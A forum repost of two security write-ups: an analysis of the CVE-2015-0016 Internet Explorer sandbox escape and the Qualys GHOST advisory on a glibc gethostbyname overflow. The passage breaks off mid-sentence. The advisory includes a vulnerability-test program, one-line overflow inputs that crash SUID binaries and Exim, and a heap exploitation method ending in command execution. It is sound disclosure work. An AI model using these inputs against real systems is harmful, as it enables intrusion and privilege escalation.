Nytro

CVE-2015-0016: Escaping the Internet Explorer Sandbox 11:04 pm (UTC-7) | by Henry Li (Threats Analyst ) Part of this January’s Patch Tuesday releases was MS15-004, which fixed a vulnerability that could be used in escalation of privilege attacks. I analyzed this vulnerability (designated as CVE-2015-0016) because it may be the first vulnerability in the wild that showed the capability to escape the Internet Explorer sandbox. As sandboxing represents a key part of exploit mitigation techniques, any exploit that can break established sandboxes is worth a second look. The vulnerability in the module TSWbPrxy.exe, which is an ActiveX Control. This module acts as the web proxy of the Microsoft Remote Desktop. Patch differences First, I used the IDA plugin patchdiff2 to see what modifications the patch had made. This was in the functionCTSWebProxy::StartRemoteDestop. Using OleView, I loaded TSWbPrxy.exe to see the definition of CTSWebProxy::StartRemoteDestop. Figure 1. Definition of StartRemoteDesktop I found that StartRemoteDesktop has two parameters, both related to mstsc.exe, which is the Remote Desktop application: bstrMstsc: the file path of mstsc.exe bstrArguments: the parameters of mstsc.exe The StartRemoteDesktop function creates a process to launch mstsc.exe. I used the IDA plugins to show more clearly the differences between the patched and unpatched versions: Figure 2. Differences between patched and unpatched versions (Click to enlarge) On the left is the patched version of this procedure. On the right is the unpatched version. On the patched version, before the call for CreateProcessW is carried out, check_path (shown in grey) is called. No such call exists on the unpatched version. Let’s look at this particular function: Figures 3 and 4. Code of check_path It has one parameter (lpApplicationName) and performs the following routines: First check lpApplicationName length. It this is bigger than 0x104, return error 0x80075007. Format lpApplicationName, convert char ‘/’ to char ‘\’ and save the result to var_formatApplicationNmae. call CompareStringW to compare the string SystemDirectory + “mstsc.exe” with the stringvar_formatApplicationNmae. If the two are equal, check_path returns 0. call CompareStringW to compare the string SystemWow64Directory + “mstsc.exe” with var_formatApplicationNmae. If the two are equal, check_path returns 0 otherwise it returns error 0x80075007. This allows us to see just how Microsoft patched the vulnerability. It checks if lpApplicationName is equivalent to the full path of the Remote Desktop application if it’s located in the System directory (which is C:\Windows\System32 for the 32-bit version and C:\Windows\SysWOW64 for the 64-bit version). If these two match, the process is created, otherwise an error is returned. The root cause of the vulnerability is simple: the correct purpose of the StartRemoteDesktop function is to launch the Remote Desktop application, mstsc.exe. However, when the programmer implemented this function checking of thelpApplicationName parameter was not implemented. This means that the function can be used to launch arbitrary processes if the parameter lpApplicationName is modified. Below is the code for the unpatched version: Figure 5. Unpatched code Escaping the Internet Explorer sandbox In order to escape the Internet Explorer sandbox, we first need to see how sandbox elevation polices are implemented. Elevation polices determine how a process or a COM server will be launched, and with what privilege level. These are stored in registry keys under: HKLM\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{GUID} Each registry key has the following values under it: AppName: Application executable name AppPath: Application path Policy: this value specifies the privilege level of the executable, and can be any of the following values: Figure 6. Varying policy settings We will look at processes with the Policy value of 3. At this level, the Internet Explorer sandbox silently launches an application as a medium integrity process under the Internet Explorer broker process. One such file is TSWbPryx.exe, the ActiveX control tied to MS15-004. Figure 7. Settings in Windows Registry for TSWbPryx.exe If an attacker can use a separate vulnerability to obtain a low integrity process within the sandbox, they can use theTSWbPrxy ActiveX control to call StartRemoteDesktop. This will launch an application (chosen by the attacker) with medium integrity, like its parent process TSWbPrxy.exe. We can combine this vulnerability with CVE-2014-6332 (which we’ve previously analyzed)to do this. Combined, we can escape the Internet Explorer sandbox and can run an app with medium integrity. In addition, used correctly CVE-2014-6332 can be used to bypass ActiveX security mechanisms. This will allow Internet Explorer to run these controls without a dialog (like the one below) being shown to the user: Figure 8. ActiveX control alert The end result will be an attacker able to run their specified application with medium integrity, as seen in the screenshot below. Figure 9. Calculator being run with medium integrity Solutions and Recommendations While this vulnerability could pose a risk used with other vulnerabilities, it’s worth noting that Microsoft has already patched these issues as part of their regular Patch Tuesday cycles. Users with up-to-date systems would not be at risk, and neither would users of other browsers. In addition, thee enhanced sandbox mentioned in this blog post is not present in older versions of Windows, such as Windows 7. While it can be bypassed (with effort), it is still an effective method to protect against many attacks. Using newer versions of Windows and Internet Explorer allows for improved exploit mitigation techniques to be used. Sursa: http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/

GHOST: glibc gethostbyname buffer overflow Qualys Security Advisory CVE-2015-0235 GHOST: glibc gethostbyname buffer overflow --[ Contents ]---------------------------------------------------------------- 1 - Summary 2 - Analysis 3 - Mitigating factors 4 - Case studies 5 - Exploitation 6 - Acknowledgments --[ 1 - Summary ]------------------------------------------------------------- During a code audit performed internally at Qualys, we discovered a buffer overflow in the __nss_hostname_digits_dots() function of the GNU C Library (glibc). This bug is reachable both locally and remotely via the gethostbyname*() functions, so we decided to analyze it -- and its impact -- thoroughly, and named this vulnerability "GHOST". Our main conclusions are: - Via gethostbyname() or gethostbyname2(), the overflowed buffer is located in the heap. Via gethostbyname_r() or gethostbyname2_r(), the overflowed buffer is caller-supplied (and may therefore be located in the heap, stack, .data, .bss, etc; however, we have seen no such call in practice). - At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit machines, and 8 bytes on 64-bit machines). Bytes can be overwritten only with digits ('0'...'9'), dots ('.'), and a terminating null character ('\0'). - Despite these limitations, arbitrary code execution can be achieved. As a proof of concept, we developed a full-fledged remote exploit against the Exim mail server, bypassing all existing protections (ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will publish our exploit as a Metasploit module in the near future. - The first vulnerable version of the GNU C Library is glibc-2.2, released on November 10, 2000. - We identified a number of factors that mitigate the impact of this bug. In particular, we discovered that it was fixed on May 21, 2013 (between the releases of glibc-2.17 and glibc-2.18). Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example. --[ 2 - Analysis ]------------------------------------------------------------ The vulnerable function, __nss_hostname_digits_dots(), is called internally by the glibc in nss/getXXbyYY.c (the non-reentrant version) and nss/getXXbyYY_r.c (the reentrant version). However, the calls are surrounded by #ifdef HANDLE_DIGITS_DOTS, a macro defined only in: - inet/gethstbynm.c - inet/gethstbynm2.c - inet/gethstbynm_r.c - inet/gethstbynm2_r.c - nscd/gethstbynm3_r.c These files implement the gethostbyname*() family, and hence the only way to reach __nss_hostname_digits_dots() and its buffer overflow. The purpose of this function is to avoid expensive DNS lookups if the hostname argument is already an IPv4 or IPv6 address. The code below comes from glibc-2.17: 35 int 36 __nss_hostname_digits_dots (const char *name, struct hostent *resbuf, 37 char **buffer, size_t *buffer_size, 38 size_t buflen, struct hostent **result, 39 enum nss_status *status, int af, int *h_errnop) 40 { .. 57 if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':') 58 { 59 const char *cp; 60 char *hostname; 61 typedef unsigned char host_addr_t[16]; 62 host_addr_t *host_addr; 63 typedef char *host_addr_list_t[2]; 64 host_addr_list_t *h_addr_ptrs; 65 char **h_alias_ptr; 66 size_t size_needed; .. 85 size_needed = (sizeof (*host_addr) 86 + sizeof (*h_addr_ptrs) + strlen (name) + 1); 87 88 if (buffer_size == NULL) 89 { 90 if (buflen < size_needed) 91 { .. 95 goto done; 96 } 97 } 98 else if (buffer_size != NULL && *buffer_size < size_needed) 99 { 100 char *new_buf; 101 *buffer_size = size_needed; 102 new_buf = (char *) realloc (*buffer, *buffer_size); 103 104 if (new_buf == NULL) 105 { ... 114 goto done; 115 } 116 *buffer = new_buf; 117 } ... 121 host_addr = (host_addr_t *) *buffer; 122 h_addr_ptrs = (host_addr_list_t *) 123 ((char *) host_addr + sizeof (*host_addr)); 124 h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs)); 125 hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr); 126 127 if (isdigit (name[0])) 128 { 129 for (cp = name;; ++cp) 130 { 131 if (*cp == '\0') 132 { 133 int ok; 134 135 if (*--cp == '.') 136 break; ... 142 if (af == AF_INET) 143 ok = __inet_aton (name, (struct in_addr *) host_addr); 144 else 145 { 146 assert (af == AF_INET6); 147 ok = inet_pton (af, name, host_addr) > 0; 148 } 149 if (! ok) 150 { ... 154 goto done; 155 } 156 157 resbuf->h_name = strcpy (hostname, name); ... 194 goto done; 195 } 196 197 if (!isdigit (*cp) && *cp != '.') 198 break; 199 } 200 } ... Lines 85-86 compute the size_needed to store three (3) distinct entities in buffer: host_addr, h_addr_ptrs, and name (the hostname). Lines 88-117 make sure the buffer is large enough: lines 88-97 correspond to the reentrant case, lines 98-117 to the non-reentrant case. Lines 121-125 prepare pointers to store four (4) distinct entities in buffer: host_addr, h_addr_ptrs, h_alias_ptr, and hostname. The sizeof (*h_alias_ptr) -- the size of a char pointer -- is missing from the computation of size_needed. The strcpy() on line 157 should therefore allow us to write past the end of buffer, at most (depending on strlen(name) and alignment) 4 bytes on 32-bit machines, or 8 bytes on 64-bit machines. There is a similar strcpy() after line 200, but no buffer overflow: 236 size_needed = (sizeof (*host_addr) 237 + sizeof (*h_addr_ptrs) + strlen (name) + 1); ... 267 host_addr = (host_addr_t *) *buffer; 268 h_addr_ptrs = (host_addr_list_t *) 269 ((char *) host_addr + sizeof (*host_addr)); 270 hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs); ... 289 resbuf->h_name = strcpy (hostname, name); In order to reach the overflow at line 157, the hostname argument must meet the following requirements: - Its first character must be a digit (line 127). - Its last character must not be a dot (line 135). - It must comprise only digits and dots (line 197) (we call this the "digits-and-dots" requirement). - It must be long enough to overflow the buffer. For example, the non-reentrant gethostbyname*() functions initially allocate their buffer with a call to malloc(1024) (the "1-KB" requirement). - It must be successfully parsed as an IPv4 address by inet_aton() (line 143), or as an IPv6 address by inet_pton() (line 147). Upon careful analysis of these two functions, we can further refine this "inet-aton" requirement: . It is impossible to successfully parse a "digits-and-dots" hostname as an IPv6 address with inet_pton() (':' is forbidden). Hence it is impossible to reach the overflow with calls to gethostbyname2() or gethostbyname2_r() if the address family argument is AF_INET6. . Conclusion: inet_aton() is the only option, and the hostname must have one of the following forms: "a.b.c.d", "a.b.c", "a.b", or "a", where a, b, c, d must be unsigned integers, at most 0xfffffffful, converted successfully (ie, no integer overflow) by strtoul() in decimal or octal (but not hexadecimal, because 'x' and 'X' are forbidden). --[ 3 - Mitigating factors ]-------------------------------------------------- The impact of this bug is reduced significantly by the following reasons: - A patch already exists (since May 21, 2013), and has been applied and tested since glibc-2.18, released on August 12, 2013: [BZ #15014] * nss/getXXbyYY_r.c (INTERNAL (REENTRANT_NAME)) [HANDLE_DIGITS_DOTS]: Set any_service when digits-dots parsing was successful. * nss/digits_dots.c (__nss_hostname_digits_dots): Remove redundant variable declarations and reallocation of buffer when parsing as IPv6 address. Always set NSS status when called from reentrant functions. Use NETDB_INTERNAL instead of TRY_AGAIN when buffer too small. Correct computation of needed size. * nss/Makefile (tests): Add test-digits-dots. * nss/test-digits-dots.c: New test. - The gethostbyname*() functions are obsolete; with the advent of IPv6, recent applications use getaddrinfo() instead. - Many programs, especially SUID binaries reachable locally, use gethostbyname() if, and only if, a preliminary call to inet_aton() fails. However, a subsequent call must also succeed (the "inet-aton" requirement) in order to reach the overflow: this is impossible, and such programs are therefore safe. - Most of the other programs, especially servers reachable remotely, use gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also known as full-circle reverse DNS) checks. These programs are generally safe, because the hostname passed to gethostbyname() has normally been pre-validated by DNS software: . "a string of labels each containing up to 63 8-bit octets, separated by dots, and with a maximum total of 255 octets." This makes it impossible to satisfy the "1-KB" requirement. . Actually, glibc's DNS resolver can produce hostnames of up to (almost) 1025 characters (in case of bit-string labels, and special or non-printable characters). But this introduces backslashes ('\\') and makes it impossible to satisfy the "digits-and-dots" requirement. --[ 4 - Case studies ]-------------------------------------------------------- In this section, we will analyze real-world examples of programs that call the gethostbyname*() functions, but we first introduce a small test program that checks whether a system is vulnerable or not: [user@fedora-19 ~]$ cat > GHOST.c << EOF #include <netdb.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #define CANARY "in_the_coal_mine" struct { char buffer[1024]; char canary[sizeof(CANARY)]; } temp = { "buffer", CANARY }; int main(void) { struct hostent resbuf; struct hostent *result; int herrno; int retval; /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/ size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1; char name[sizeof(temp.buffer)]; memset(name, '0', len); name[len] = '\0'; retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno); if (strcmp(temp.canary, CANARY) != 0) { puts("vulnerable"); exit(EXIT_SUCCESS); } if (retval == ERANGE) { puts("not vulnerable"); exit(EXIT_SUCCESS); } puts("should not happen"); exit(EXIT_FAILURE); } EOF [user@fedora-19 ~]$ gcc GHOST.c -o GHOST On Fedora 19 (glibc-2.17): [user@fedora-19 ~]$ ./GHOST vulnerable On Fedora 20 (glibc-2.18): [user@fedora-20 ~]$ ./GHOST not vulnerable ----[ 4.1 - The GNU C Library ]----------------------------------------------- The glibc itself contains a few calls to gethostbyname*() functions. In particular, getaddrinfo() calls gethostbyname2_r() if, but only if, a first call to inet_aton() fails: in accordance with the "inet-aton" requirement, these internal calls are safe. For example, eglibc-2.13/sysdeps/posix/getaddrinfo.c: at->family = AF_UNSPEC; ... if (__inet_aton (name, (struct in_addr *) at->addr) != 0) { if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET) at->family = AF_INET; else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED)) { ... at->family = AF_INET6; } else return -EAI_ADDRFAMILY; ... } ... if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0) { ... size_t tmpbuflen = 512; char *tmpbuf = alloca (tmpbuflen); ... rc = __gethostbyname2_r (name, family, &th, tmpbuf, tmpbuflen, &h, &herrno); ... } ----[ 4.2 - mount.nfs ]------------------------------------------------------- Similarly, mount.nfs (a SUID-root binary) is not vulnerable: if (inet_aton(hostname, &addr->sin_addr)) return 0; if ((hp = gethostbyname(hostname)) == NULL) { nfs_error(_("%s: can't get address for %s\n"), progname, hostname); return -1; } ----[ 4.3 - mtr ]------------------------------------------------------------- mtr (another SUID-root binary) is not vulnerable either, because it calls getaddrinfo() instead of gethostbyname*() functions on any modern (ie, IPv6-enabled) system: #ifdef ENABLE_IPV6 /* gethostbyname2() is deprecated so we'll use getaddrinfo() instead. */ ... error = getaddrinfo( Hostname, NULL, &hints, &res ); if ( error ) { if (error == EAI_SYSTEM) perror ("Failed to resolve host"); else fprintf (stderr, "Failed to resolve host: %s\n", gai_strerror(error)); exit( EXIT_FAILURE ); } ... #else host = gethostbyname(Hostname); if (host == NULL) { herror("mtr gethostbyname"); exit(1); } ... #endif ----[ 4.4 - iputils ]--------------------------------------------------------- ------[ 4.4.1 - clockdiff ]--------------------------------------------------- clockdiff is vulnerable in a straightforward manner: hp = gethostbyname(argv[1]); if (hp == NULL) { fprintf(stderr, "clockdiff: %s: host not found\n", argv[1]); exit(1); } [user@fedora-19-32b ~]$ ls -l /usr/sbin/clockdiff -rwxr-xr-x. 1 root root 15076 Feb 1 2013 /usr/sbin/clockdiff [user@fedora-19-32b ~]$ getcap /usr/sbin/clockdiff /usr/sbin/clockdiff = cap_net_raw+ep [user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c "print '0' * $((0x10000-16*1-2*4-1-4))"` .Segmentation fault [user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c "print '0' * $((0x20000-16*1-2*4-1-4))"` Segmentation fault [user@fedora-19-32b ~]$ dmesg ... [202071.118929] clockdiff[3610]: segfault at b86711f4 ip b75de0c6 sp bfc191f0 error 6 in libc-2.17.so[b7567000+1b8000] [202086.144336] clockdiff[3618]: segfault at b90d0d24 ip b75bb0c6 sp bf8e9dc0 error 6 in libc-2.17.so[b7544000+1b8000] ------[ 4.4.2 - ping and arping ]--------------------------------------------- ping and arping call gethostbyname() and gethostbyname2(), respectively, if and only if inet_aton() fails first. This time, however, there is another function call in between (Fedora, for example, does define USE_IDN): --------[ 4.4.2.1 - ping ]---------------------------------------------------- if (inet_aton(target, &whereto.sin_addr) == 1) { ... } else { char *idn; #ifdef USE_IDN int rc; ... rc = idna_to_ascii_lz(target, &idn, 0); if (rc != IDNA_SUCCESS) { fprintf(stderr, "ping: IDN encoding failed: %s\n", idna_strerror(rc)); exit(2); } #else idn = target; #endif hp = gethostbyname(idn); --------[ 4.4.2.2 - arping ]-------------------------------------------------- if (inet_aton(target, &dst) != 1) { struct hostent *hp; char *idn = target; #ifdef USE_IDN int rc; rc = idna_to_ascii_lz(target, &idn, 0); if (rc != IDNA_SUCCESS) { fprintf(stderr, "arping: IDN encoding failed: %s\n", idna_strerror(rc)); exit(2); } #endif hp = gethostbyname2(idn, AF_INET); --------[ 4.4.2.3 - Analysis ]------------------------------------------------ If idna_to_ascii_lz() modifies the target hostname, the first call to inet_aton() could fail and the second call (internal to gethostbyname()) could succeed. For example, idna_to_ascii_lz() transforms any Unicode dot-like character (0x3002, 0xFF0E, 0xFF61) into an ASCII dot ("."). But it also restricts the length of a domain label to 63 characters: this makes it impossible to reach 1024 bytes (the "1-KB" requirement) with only 4 labels and 3 dots (the "inet-aton" requirement). Unless inet_aton() (actually, strtoul()) can be tricked into accepting more than 3 dots? Indeed, idna_to_ascii_lz() does not restrict the total length of a domain name. glibc supports "thousands' grouping characters" (man 3 printf); for example, sscanf(str, "%'lu", &ul) yields 1000 when processing any of the following input strings: - "1,000" in an English locale; - "1 000" in a French locale; and - "1.000" in a German or Spanish locale. strtoul() implements this "number grouping" too, but its use is limited to internal glibc functions. Conclusion: more than 3 dots is impossible, and neither ping nor arping is vulnerable. ----[ 4.5 - procmail ]-------------------------------------------------------- procmail (a SUID-root and SGID-mail binary) is vulnerable through its "comsat/biff" feature: #define COMSAThost "localhost" /* where the biff/comsat daemon lives */ ... #define SERV_ADDRsep '@' /* when overriding in COMSAT=serv@addr */ int setcomsat(chp)const char*chp; { char*chad; ... chad=strchr(chp,SERV_ADDRsep); /* @ separator? */ ... if(chad) *chad++='\0'; /* split the specifier */ if(!chad||!*chad) /* no host */ #ifndef IP_localhost /* Is "localhost" preresolved? */ chad=COMSAThost; /* nope, use default */ #else /* IP_localhost */ { ... } else #endif /* IP_localhost */ { ... if(!(host=gethostbyname(chad))||!host->h_0addr_list) user@debian-7-2-32b:~$ ls -l /usr/bin/procmail -rwsr-sr-x 1 root mail 83912 Jun 6 2012 /usr/bin/procmail user@debian-7-2-32b:~$ /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null ... *** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x0980de30 *** ======= Backtrace: ========= /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x70f01)[0xb76b2f01] /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x72768)[0xb76b4768] /lib/i386-linux-gnu/i686/cmov/libc.so.6(cfree+0x6d)[0xb76b781d] /usr/bin/procmail[0x80548ec] /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7658e46] /usr/bin/procmail[0x804bb55] ======= Memory map: ======== ... 0980a000-0982b000 rw-p 00000000 00:00 0 [heap] ... Aborted user@debian-7-2-32b:~$ _COMSAT_='COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` user@debian-7-2-32b:~$ /usr/bin/procmail "$_COMSAT_" "$_COMSAT_"1234 < /dev/null Segmentation fault user@debian-7-2-32b:~$ /usr/bin/procmail "$_COMSAT_"12345670 "$_COMSAT_"123456701234 < /dev/null Segmentation fault user@debian-7-2-32b:~$ dmesg ... [211409.564917] procmail[4549]: segfault at c ip b768e5a4 sp bfcb53d8 error 4 in libc-2.13.so[b761c000+15c000] [211495.820710] procmail[4559]: segfault at b8cb290c ip b763c5a4 sp bf870c98 error 4 in libc-2.13.so[b75ca000+15c000] ----[ 4.6 - pppd ]------------------------------------------------------------ pppd (yet another SUID-root binary) calls gethostbyname() if a preliminary call to inet_addr() (a simple wrapper around inet_aton()) fails. "The inet_addr() function converts the Internet host address cp from IPv4 numbers-and-dots notation into binary data in network byte order. If the input is invalid, INADDR_NONE (usually -1) is returned. Use of this function is problematic because -1 is a valid address (255.255.255.255)." A failure for inet_addr(), but a success for inet_aton(), and consequently a path to the buffer overflow. user@ubuntu-12-04-32b:~$ ls -l /usr/sbin/pppd -rwsr-xr-- 1 root dip 273272 Feb 3 2011 /usr/sbin/pppd user@ubuntu-12-04-32b:~$ id uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev) ------[ 4.6.1 - ms-dns option ]----------------------------------------------- static int setdnsaddr(argv) char **argv; { u_int32_t dns; struct hostent *hp; dns = inet_addr(*argv); if (dns == (u_int32_t) -1) { if ((hp = gethostbyname(*argv)) == NULL) { option_error("invalid address parameter '%s' for ms-dns option", *argv); return 0; } dns = *(u_int32_t *)hp->h_addr; } user@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255' *** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09c0f928 *** ======= Backtrace: ========= /lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb75e1ee2] /lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb75d1db5] /lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75d1deb] /usr/sbin/pppd(options_from_file+0xa8)[0x8064948] /usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e] /usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4] /usr/sbin/pppd(main+0x1cf)[0x8050b2f] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb75854d3] ======= Memory map: ======== ... 09c0c000-09c2d000 rw-p 00000000 00:00 0 [heap] ... Aborted (core dumped) ------[ 4.6.2 - ms-wins option ]---------------------------------------------- static int setwinsaddr(argv) char **argv; { u_int32_t wins; struct hostent *hp; wins = inet_addr(*argv); if (wins == (u_int32_t) -1) { if ((hp = gethostbyname(*argv)) == NULL) { option_error("invalid address parameter '%s' for ms-wins option", *argv); return 0; } wins = *(u_int32_t *)hp->h_addr; } user@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-wins' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255' *** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x08a64928 *** ======= Backtrace: ========= /lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb757aee2] /lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb756adb5] /lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb756adeb] /usr/sbin/pppd(options_from_file+0xa8)[0x8064948] /usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e] /usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4] /usr/sbin/pppd(main+0x1cf)[0x8050b2f] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb751e4d3] ======= Memory map: ======== ... 08a61000-08a82000 rw-p 00000000 00:00 0 [heap] ... Aborted (core dumped) ------[ 4.6.3 - socket option ]----------------------------------------------- static int open_socket(dest) char *dest; { char *sep, *endp = NULL; int sock, port = -1; u_int32_t host; struct hostent *hent; ... sep = strchr(dest, ':'); if (sep != NULL) port = strtol(sep+1, &endp, 10); if (port < 0 || endp == sep+1 || sep == dest) { error("Can't parse host:port for socket destination"); return -1; } *sep = 0; host = inet_addr(dest); if (host == (u_int32_t) -1) { hent = gethostbyname(dest); if (hent == NULL) { error("%s: unknown host in socket option", dest); *sep = ':'; return -1; } host = *(u_int32_t *)(hent->h_addr_list[0]); } user@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'socket' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255:1' user@ubuntu-12-04-32b:~$ *** glibc detected *** /usr/sbin/pppd: malloc(): memory corruption: 0x09cce270 *** ----[ 4.7 - Exim ]------------------------------------------------------------ The Exim mail server is exploitable remotely if configured to perform extra security checks on the HELO and EHLO commands ("helo_verify_hosts" or "helo_try_verify_hosts" option, or "verify = helo" ACL); we developed a reliable and fully-functional exploit that bypasses all existing protections (ASLR, PIE, NX) on 32-bit and 64-bit machines. user@debian-7-7-64b:~$ grep helo /var/lib/exim4/config.autogenerated | grep verify helo_verify_hosts = * user@debian-7-7-64b:~$ python -c "print '0' * $((0x500-16*1-2*8-1-8))" 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 user@debian-7-7-64b:~$ telnet 127.0.0.1 25 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 debian-7-7-64b ESMTP Exim 4.80 ... HELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Connection closed by foreign host. user@debian-7-7-64b:~$ dmesg ... [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000] --[ 5 - Exploitation ]-------------------------------------------------------- ----[ 5.1 - Code execution ]-------------------------------------------------- In this section, we describe how we achieve remote code execution against the Exim SMTP mail server, bypassing the NX (No-eXecute) protection and glibc's malloc hardening. First, we overflow gethostbyname's heap-based buffer and partially overwrite the size field of the next contiguous free chunk of memory with a slightly larger size (we overwrite only 3 bytes of the size field; in any case, we cannot overflow more than 4 bytes on 32-bit machines, or 8 bytes on 64-bit machines): |< malloc_chunk | -----|----------------------|---+--------------------|----- ... | gethostbyname buffer |p|s|f|b|F|B| free chunk | ... -----|----------------------|---+--------------------|----- | X| |------------------------->| overflow where: struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ struct malloc_chunk* fd; /* double links -- used only if free. */ struct malloc_chunk* bk; /* Only used for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ struct malloc_chunk* bk_nextsize; }; and: X marks the spot where the crucial memory corruption takes place. As a result, this artificially-enlarged free chunk, which is managed by glibc's malloc, overlaps another block of memory, Exim's current_block, which is managed by Exim's internal memory allocator: |< malloc_chunk |< storeblock | | -----|----------------------|------------------------|---------------+---|----- ... | gethostbyname buffer |p|s|f|b|F|B| free chunk |n|l| current_block | ... -----|----------------------|------------------------|---------------+---|----- | | |<-------------------------------------->| artificially enlarged free chunk where: typedef struct storeblock { struct storeblock *next; size_t length; } storeblock; Then, we partially allocate the enlarged free chunk and overwrite the beginning of Exim's current_block of memory (the "storeblock" structure) with arbitrary data. In particular, we overwrite its "next" field: |< malloc_chunk |< storeblock | | -----|----------------------|------------------------|--------+----------|----- ... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaaaaa |n|l| current_block | ... -----|----------------------|------------------------|--------+----------|----- | X | |<------------------------------->| allocated chunk This effectively turns gethostbyname's buffer overflow into a write-anything-anywhere primitive, because we control both the pointer to the next block of memory returned by Exim's allocator (the hijacked "next" pointer) and the data allocated (a null-terminated string, the argument of an SMTP command we send to Exim). Finally, we use this write-anything-anywhere primitive to overwrite Exim's run-time configuration, which is cached in the heap memory. More precisely, we overwrite Exim's Access Control Lists (ACLs), and achieve arbitrary command execution thanks to Exim's "${run{<command> <args>}}" string expansion mechanism: |< storeblock | -----|-------------------------------|---------------|-------------------|----- ... | Exim's run-time configuration | ... .. .. ... |n|l| current_block | ... -----|----x--------------------------|---------------|x------------------|----- | | '<------------------------------------------' hijacked next pointer |< ACLs >| -----|----+-----+--------+------+----|---------------|-------------------|----- ... | Exim's run-time configuration | ... .. .. ... | old current_block | ... -----|----+-----+--------+------+----|---------------|-------------------|----- | XXXXXXXX | |<------------------->| new current_block ----[ 5.2 - Information leak ]------------------------------------------------ The success of this exploit depends on an important piece of information: the address of Exim's run-time configuration in the heap. In this section, we describe how we obtain this address, bypassing the ASLR (Address Space Layout Randomization) and PIE (Position Independent Executable) protections. First, we overflow gethostbyname's heap-based buffer and partially overwrite the size field of the next contiguous 